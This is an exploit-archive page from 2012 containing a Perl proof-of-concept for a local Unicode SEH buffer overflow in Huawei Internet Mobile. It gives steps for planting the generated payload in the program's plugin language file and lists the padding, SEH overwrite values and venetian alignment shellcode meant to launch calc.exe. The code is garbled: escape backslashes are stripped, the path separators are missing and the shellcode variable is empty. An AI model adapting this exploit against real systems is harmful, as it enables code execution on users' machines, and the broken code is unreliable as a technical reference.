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# Title : Huawei Technologies Internet Mobile Unicode SEH Exploit
# Published : 2012-10-15
# Author :
# Previous Title : Windows AlwaysInstallElevated MSI
# Next Title : mcrypt <= 2.5.8 Stack Based Overflow

# Souhail Hammou - Independant Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail   : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .
# Vulnerable : Etisalat , Vodafone , Meditel , Maroc Telecom , Royal KPN , Cell C , STC ...

# Title : Huawei Technologies - Internet Mobile 0day Unicode SEH Based Vulnerability .
# Author : Dark-Puzzle
# Versions : All Versions Are Vulnerable , The behavior of the program when exploiting may vary from an OS to another OS .
# RISK : Critical .
# Type : Local .
# Video : https://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
# Use it at your own risk #
# Info : This exploit works only on WinXP SP1 because it is almost impossible to execute it on Win7 & WinXP SP2/SP3 cause This program has been compiled with SafeSEH enabled .
# So in other versions of Windows you will not find any valid UNICODE addresses (No SafeSEH) neither in OS modules nor in Program Modules .
# Anyway this exploit works perfectly on Windows XP SP1 .
# Here it is , the video explain the usage =) :  http://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )

# So first go to C:program filesInternet MobilepluginsSMSUIPluginSMSUIPlugin_fr-fr.lang or _en-fr.lang (according to the program language)
# Then put the output of this perl program  in <item name="IDS_PLUGIN_NAME">HERE !!</item> . Save it open the program .
# Not like Win7 & WinXP SP2/SP3 this exploit requires you to click from the to menu "Operation" --> "Message texte" !! Bingo . Calc.exe Just Showed Up =) .
#                                                                               English :"Operation" --> "Text Message"

my $size = 43680;                                                        
my $junk = "A" x 146 ;
my $nseh = "x61x62"; # Popad + Align .
my $seh  = "x88xDC"; # p/p/r From OLE32.DLL ( Windows XP SP1 Only)
# The Venetian Shellcode : 
my $ven = 
"x6e". # Align Code
"x53". # push ebx
"x6e". # Align Code
"x58". # pop eax
"x6e". # Align Code
"x05x17x11". # add eax, 0x11001700
"x6e". # Align Code
"x2dx16x11". # sub eax, 0x11001600
"x6e". # Align Code
"x50". # push eax
"x6e". # Align Code
"xc3"; # ret

my $more = "D" x 108 ; # Exact Value To Make the Venetian shellcode work.

# CALC.exe Shellcode .
my $shellcode =

my $morestuff = "D" x ( 43680 - length($junk.$nseh.$seh));
$payload = $junk.$nseh.$seh.$ven.$more.$shellcode.$morestuff;
open (myfile,'>mobile.txt');
print myfile $payload;
print "Huawei Technologies Unicode SEH Based Overflown";
print "x44x69x73x63x6Fx76x65x72x65x64x20x26x20x50x6Fx43x20x42x79x20x44x61x72x6Bx2Dx50x75x7Ax7Ax6Cx65n";
print "Creating Input Please Be Patientn";
sleep 5;